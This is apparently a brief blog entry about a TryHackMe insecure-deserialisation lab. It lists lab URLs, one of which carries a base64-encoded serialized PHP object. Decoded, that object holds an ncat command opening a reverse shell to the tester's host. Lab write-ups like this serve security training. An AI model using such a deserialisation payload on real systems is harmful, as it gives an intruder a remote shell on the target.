It’s the end of the week, Friday is here and we are back at it again.. on THM!
Today we kick of with the Advanced Server-Side Attacks section of the Web Application Pentesting Pathway.
The first box we are going to tackle today (or atleast attempt to) will be Insecure Deserialisation.
http://10.10.177.40/who/index.php
http://10.10.177.40/who/index.php~
10.10.102.51/case2/?decode=TzoxNzoiTWFsaWNpb3VzVXNlckRhdGEiOjE6e3M6NzoiY29tbWFuZCI7czozODoibmNhdCAtbnYgMTAuMTEuMTI1LjE1MCA0NDQ0IC1lIC9iaW4vc2giO30=
http://10.10.102.51:8089/get-key
http://10.10.102.51:8089/
Until next time & don’t sleepwalk through life!
Bless